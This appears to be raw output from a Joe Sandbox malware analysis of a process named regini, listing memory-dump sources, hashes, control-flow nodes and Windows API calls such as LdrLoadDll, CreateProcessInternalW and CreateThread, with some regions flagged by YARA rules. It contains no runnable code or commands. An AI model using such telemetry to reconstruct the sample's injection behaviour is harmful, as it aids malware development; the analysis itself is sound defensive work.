                                                                  • Instruction ID: 041634e139c5cab3de8ae4913ee766603494fc3b783c4831d3b175ffca5ca1d5
                                                                  • Opcode Fuzzy Hash: bfccf9f350708c5971f7bcf0dd7e247cced89c6e3a08914fcafdb617e5e277c0
                                                                  • Instruction Fuzzy Hash: 1D90026521184803D180B55948046070005C7E0302F55C016A2064955E8B2B8D516139
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: af2c39af585021cc70410ee39c70c6edd0d3fe39b2d8a1ef1d9f2c659dfa5bde
                                                                  • Instruction ID: e21eca0d4752df6d6161d5782362c25d02341f375356c4944dda8c8134a5924d
                                                                  • Opcode Fuzzy Hash: af2c39af585021cc70410ee39c70c6edd0d3fe39b2d8a1ef1d9f2c659dfa5bde
                                                                  • Instruction Fuzzy Hash: 5B90022561144902D141B1594404616000AC7E0241F95C027A1024955ECB278A92A135
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 1afb4e4fba97b0ac207e31fa4ae1ba3bcaa016683153239fa2455f2bcef14d1d
                                                                  • Instruction ID: e1e824288879f9cd2d12d69655da92df1a9f825a218fc2f6d00371daf561d3bf
                                                                  • Opcode Fuzzy Hash: 1afb4e4fba97b0ac207e31fa4ae1ba3bcaa016683153239fa2455f2bcef14d1d
                                                                  • Instruction Fuzzy Hash: 9490022D22344402D1C0B159540860A0005C7E1202F95D41AA0015958CCB1789695325
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 5036b8d2a47235b83bc94b0163797dff50e1300246bb884b8dcc196cd206e1fe
                                                                  • Instruction ID: 89eaacf229ae0ce3f9aecbb02c0efdcfb0e906512239e0c4db40f83ad58f257c
                                                                  • Opcode Fuzzy Hash: 5036b8d2a47235b83bc94b0163797dff50e1300246bb884b8dcc196cd206e1fe
                                                                  • Instruction Fuzzy Hash: EE90022531144403D180B15954186064005D7F1301F55D016E0414954CDB1789565226
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 53e161bb0a48c08b4d1b44cc7b19931d9c2d7ebfbaa9306653c8b25a34f51fe2
                                                                  • Instruction ID: a1a31829abce683e936ea4c30c4f1344a54f9e838fafdee7d03802f7d6f348c6
                                                                  • Opcode Fuzzy Hash: 53e161bb0a48c08b4d1b44cc7b19931d9c2d7ebfbaa9306653c8b25a34f51fe2
                                                                  • Instruction Fuzzy Hash: 7A900225252485525585F15944045074006D7F0241795C017A1414D50C87279956D625
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: ede3a2d587cb943c9279b8dd9738bd88b6ce98162e313cf865354d8376c11fc4
                                                                  • Instruction ID: a4e260661a36aba86f445ee23974bde7726213d14343bdb8584a0ea45ef802af
                                                                  • Opcode Fuzzy Hash: ede3a2d587cb943c9279b8dd9738bd88b6ce98162e313cf865354d8376c11fc4
                                                                  • Instruction Fuzzy Hash: 9190023521144813D151B15945047070009C7E0241F95C417A0424958D97578A52A125
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 0474e163318d360e3a18945e30eb52afc7722b138baa8edf469b3ce6ba124c2e
                                                                  • Instruction ID: 2412f3e4a833719adb06dbcdc10516f737038cdffdd703ce412d2264be374f12
                                                                  • Opcode Fuzzy Hash: 0474e163318d360e3a18945e30eb52afc7722b138baa8edf469b3ce6ba124c2e
                                                                  • Instruction Fuzzy Hash: 5190023521144C42D140B1594404B460005C7F0301F55C01BA0124A54D8717C9517525
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: e882d53a7a4e29e3deef7289567567da24d48cd6c7b8b238de19f17c566a3a1c
                                                                  • Instruction ID: 17a2c0e10632d32c2f24dea09099ca702feb8effe5293dab8d8e62103f8c2966
                                                                  • Opcode Fuzzy Hash: e882d53a7a4e29e3deef7289567567da24d48cd6c7b8b238de19f17c566a3a1c
                                                                  • Instruction Fuzzy Hash: 139002352114CC02D150B159840474A0005C7E0301F59C416A4424A58D879789917125
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 66108b65c9ea447d41799176ed0b92b1ed790e4b27176d5524e8415a69232d23
                                                                  • Instruction ID: 940224d90e359e3da0d3990cde265a35c0834b0ecc3b743fc23fe639f8c7e286
                                                                  • Opcode Fuzzy Hash: 66108b65c9ea447d41799176ed0b92b1ed790e4b27176d5524e8415a69232d23
                                                                  • Instruction Fuzzy Hash: 1990023521144802D140B59954086460005C7F0301F55D016A5024955EC76789916135
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 3f584a86bc515a34406cd8e798b925bdb346b08b14fe68530d7fb56c7379c32b
                                                                  • Instruction ID: a28be837a315b24b01e2c571c06a5ad818e824069138c0ced60e704927e37614
                                                                  • Opcode Fuzzy Hash: 3f584a86bc515a34406cd8e798b925bdb346b08b14fe68530d7fb56c7379c32b
                                                                  • Instruction Fuzzy Hash: BE90023561554802D140B15945147061005C7E0201F65C416A0424968D87978A5165A6
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 0562bb867efaad0d7d6b9c07eebb21b1a376b1025bc683bf5f376a1f813f15cd
                                                                  • Instruction ID: 10e5c2c9214db14201303b3ac6f5146841dfd0329df7cc94a5758dbdb4fade97
                                                                  • Opcode Fuzzy Hash: 0562bb867efaad0d7d6b9c07eebb21b1a376b1025bc683bf5f376a1f813f15cd
                                                                  • Instruction Fuzzy Hash: 3090022525549502D190B15D44046164005E7F0201F55C026A0814994D875789556225

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 457 92103a-921044 458 921046-92104d 457->458 459 92107e-921081 457->459 460 921096-9210ab 458->460 461 92104f-921059 458->461 462 92112c-92114e 460->462 463 9210ad-9210c5 460->463 464 921170-921175 462->464 465 921150-921161 PostThreadMessageW 462->465 463->462 465->464 466 921163-92116d 465->466 466->464
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: +Yf$7046-nn1K$7046-nn1K
                                                                  • API String ID: 0-152878582
                                                                  • Opcode ID: 8835f3a4d3a980d73cac9d5451b61f837560031cbaac1f6e90a95f3aac6059d8
                                                                  • Instruction ID: 09b0a890f3c2ef5b6ac155053e310b4008f57ccefc55a389bcbaf602d36ed640
                                                                  • Opcode Fuzzy Hash: 8835f3a4d3a980d73cac9d5451b61f837560031cbaac1f6e90a95f3aac6059d8
                                                                  • Instruction Fuzzy Hash: 1F11A371B893666BC702CEA49C417DDB7749F52700F0485EADA049F2C2D3B14D5B87D5
                                                                  APIs
                                                                  • PostThreadMessageW.USER32(7046-nn1K,00000111,00000000,00000000), ref: 0092115D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: MessagePostThread
                                                                  • String ID: 7046-nn1K$7046-nn1K
                                                                  • API String ID: 1836367815-59622768
                                                                  • Opcode ID: 08cef4079501bae7446cdd3a4563593f3a3346a9b3449423cb903043dd6c050e
                                                                  • Instruction ID: 80cbc34c21a56e1a96ad5cf4d48d7c10a680dd796e92da9fe34ef0fa4b0d5453
                                                                  • Opcode Fuzzy Hash: 08cef4079501bae7446cdd3a4563593f3a3346a9b3449423cb903043dd6c050e
                                                                  • Instruction Fuzzy Hash: D701C471D4125876EB21AA908C02FDFBB7C9F81B50F008155FB147B281D7B86A068BE6
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InitializeUninitialize
                                                                  • String ID: @J7<
                                                                  • API String ID: 3442037557-2016760708
                                                                  • Opcode ID: 5c8f61afe39968cdc0262e8706fd851897aae8b8c2792e7432e2034d9de46969
                                                                  • Instruction ID: 0147ee324aeabfe7dad54695f411c1a2311f64f90c0dfee3086735fb4ba39fd2
                                                                  • Opcode Fuzzy Hash: 5c8f61afe39968cdc0262e8706fd851897aae8b8c2792e7432e2034d9de46969
                                                                  • Instruction Fuzzy Hash: 774133B5A006199FDB00DFD8DC809EFB7B9FF88304B104569E516AB215D775AE05CFA0
                                                                  APIs
                                                                  • Sleep.KERNELBASE(000007D0), ref: 00933D8B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID: net.dll$wininet.dll
                                                                  • API String ID: 3472027048-1269752229
                                                                  • Opcode ID: 280fd6eaa3bf16d0bfc5aa78424d18e4e624768c5d1575d100cfc6e7ad87c3e5
                                                                  • Instruction ID: c8f9448abe5e1e9b9c33a98e70495e289bd0ad5b04fe55d6804d7b9f1d6267a6
                                                                  • Opcode Fuzzy Hash: 280fd6eaa3bf16d0bfc5aa78424d18e4e624768c5d1575d100cfc6e7ad87c3e5
                                                                  • Instruction Fuzzy Hash: 7E318FB1A41605BBD714DFA4C885FEBBBBCEB84700F00851CFA295B281C7B46A408FA5
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InitializeUninitialize
                                                                  • String ID: @J7<
                                                                  • API String ID: 3442037557-2016760708
                                                                  • Opcode ID: 1c77e547fd79fcce36bf9df70f39e975db22a09bbaa201da96c6956962a185f2
                                                                  • Instruction ID: d9e79b943c96faa9156aa21ec93d88b3aecd5086cce1cb3d43ba6a9bddec7345
                                                                  • Opcode Fuzzy Hash: 1c77e547fd79fcce36bf9df70f39e975db22a09bbaa201da96c6956962a185f2
                                                                  • Instruction Fuzzy Hash: 10312FB5A0020A9FDB00DFD8D8809EEB7B9BF88304F108569E506AB214D775EE058BA0
                                                                  APIs
                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 009248F2
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Load
                                                                  • String ID:
                                                                  • API String ID: 2234796835-0
                                                                  • Opcode ID: 295511a4b9a9809ddb0f2405e035b47971a4899ec19f0757c05ee201b5cbdbb2
                                                                  • Instruction ID: 3bc2e7a4a329a3b2252f37e5e79941150f79fb3a50db8c27df5a605883a5148b
                                                                  • Opcode Fuzzy Hash: 295511a4b9a9809ddb0f2405e035b47971a4899ec19f0757c05ee201b5cbdbb2
                                                                  • Instruction Fuzzy Hash: 3A01C02AA0425C7FCF10EA74EC42AE97778DF41745F040254D585E7202E132F60F8BC1
                                                                  APIs
                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 009248F2
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Load
                                                                  • String ID:
                                                                  • API String ID: 2234796835-0
                                                                  • Opcode ID: f7aca7ff22897dbe4d74d0a4087b515c599850f7e07237e5203b5d3da9a5bb0d
                                                                  • Instruction ID: a6935a8011225f9787efbeeaeca978ab85f1e4f23051cb90cadd69cae242de53
                                                                  • Opcode Fuzzy Hash: f7aca7ff22897dbe4d74d0a4087b515c599850f7e07237e5203b5d3da9a5bb0d
                                                                  • Instruction Fuzzy Hash: 47011EB5E4020DABDB10EAA4EC42F9DB3B8AB54708F004195E909A7241F671EB14CB91
                                                                  APIs
                                                                  • CreateProcessInternalW.KERNELBASE(?,?,?,?,0092864E,00000010,?,?,?,00000044,?,00000010,0092864E,?,?,?), ref: 00939B40
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateInternalProcess
                                                                  • String ID:
                                                                  • API String ID: 2186235152-0
                                                                  • Opcode ID: d9af997e76cc9c93d5c50f47e23c34d344b85f94735d18940a576783256a0e6a
                                                                  • Instruction ID: 7e8ef2cdea560c1d477bcf7299d4347dbf4a5712278711f6410e577edcddce07
                                                                  • Opcode Fuzzy Hash: d9af997e76cc9c93d5c50f47e23c34d344b85f94735d18940a576783256a0e6a
                                                                  • Instruction Fuzzy Hash: D40180B6205108BBDB44DF99DC91EDB77ADAF8C754F018508BA49E3241D630F9518BA4
                                                                  APIs
                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00919E25
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateThread
                                                                  • String ID:
                                                                  • API String ID: 2422867632-0
                                                                  • Opcode ID: 09599bacac6296b3e500525234d41ace2e86357925da6c38dffadbb1074705f5
                                                                  • Instruction ID: 3dc2a9fc12be07bb19d472ed90bfa20a05e5db938db175ac5fb2beaf9f8f7f23
                                                                  • Opcode Fuzzy Hash: 09599bacac6296b3e500525234d41ace2e86357925da6c38dffadbb1074705f5
                                                                  • Instruction Fuzzy Hash: E6F06D7378171436E73061E99C02FDBB68CCBC0BA1F144025FB1DEB1C1D996B84186A5
                                                                  APIs
                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00919E25
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateThread
                                                                  • String ID:
                                                                  • API String ID: 2422867632-0
                                                                  • Opcode ID: 16b1c3e28c50ff0840523fe201d9b8e2824fdbd3defa945c96347b3a63df4177
                                                                  • Instruction ID: 8d17e75273a4779d0fe6df4508a5c818b03d86b901ca7728018066f14ce280d0
                                                                  • Opcode Fuzzy Hash: 16b1c3e28c50ff0840523fe201d9b8e2824fdbd3defa945c96347b3a63df4177
                                                                  • Instruction Fuzzy Hash: A5F06D7279071437D630A298CC02FCB765CCB80B61F104018FB1DAB2C1D9A5B8418AA5
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00921D69,?,00935DDA,00921D69,0093589E,00935DDA,?,00921D69,0093589E,00001000,?,?,00000000), ref: 00939A3F
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: 9a88fbf9543032f2133e8a9cac2bb7711bd7b960dc0391e09488a6e464b12435
                                                                  • Instruction ID: c7e20e9c6efc2ce3fa1a55e52ce6cca7ff22932d067fc5be9c5af47e21651eed
                                                                  • Opcode Fuzzy Hash: 9a88fbf9543032f2133e8a9cac2bb7711bd7b960dc0391e09488a6e464b12435
                                                                  • Instruction Fuzzy Hash: F3E06D752082097BCA10EE59DC41FEB33ADEFC5710F004419FA08A7241CB30B9108AB4
                                                                  APIs
                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,33F84D8B,00000007,00000000,00000004,00000000,009240EB,000000F4), ref: 00939A8F
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FreeHeap
                                                                  • String ID:
                                                                  • API String ID: 3298025750-0
                                                                  • Opcode ID: f35c0bb0e5c2be9d201f2d5a3767015d53e8d38ac539a827b4e54993e6d9bddc
                                                                  • Instruction ID: 3feedcfb57173b6994c7688939266aca32c695c945cd7ea1fea1ec1e5530efd7
                                                                  • Opcode Fuzzy Hash: f35c0bb0e5c2be9d201f2d5a3767015d53e8d38ac539a827b4e54993e6d9bddc
                                                                  • Instruction Fuzzy Hash: 06E092752102087BD610EF59DC41FDB3BACEFC5750F008408FA08A7241C731B9108BB8
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 009286BC
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: cbce35480b63f5581e3c40cdf66e398078c0d1383abfb7c38fdf9a54aebfa23b
                                                                  • Instruction ID: 9d3bc88cd949ed22e7a12c1831790b26d2e3c1f18d901edce0793e5fa66ba566
                                                                  • Opcode Fuzzy Hash: cbce35480b63f5581e3c40cdf66e398078c0d1383abfb7c38fdf9a54aebfa23b
                                                                  • Instruction Fuzzy Hash: B1E0867164130427FB246AF8EC4EF67336C9B48724F584A60B91CDB2E5ED7AF9014650
                                                                  APIs
                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,00922060,009381DF,0093589E,00922023), ref: 009284B3
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorMode
                                                                  • String ID:
                                                                  • API String ID: 2340568224-0
                                                                  • Opcode ID: cb4f1fa0d927d0eb332dcaf108405a43969d706698edad673ee7f3d7385422b0
                                                                  • Instruction ID: 7b6735874e0548d40e9c97d43675117ad62890d7ccfe7d60f14a63a268792496
                                                                  • Opcode Fuzzy Hash: cb4f1fa0d927d0eb332dcaf108405a43969d706698edad673ee7f3d7385422b0
                                                                  • Instruction Fuzzy Hash: CFE08631A453057EF750ABF49C47FDA27689B50390F044164B90DE61C6D969A4014B64
                                                                  APIs
                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,00922060,009381DF,0093589E,00922023), ref: 009284B3
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorMode
                                                                  • String ID:
                                                                  • API String ID: 2340568224-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096333258.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3270000_regini.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096333258.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3270000_regini.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                  • API String ID: 0-3558027158
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
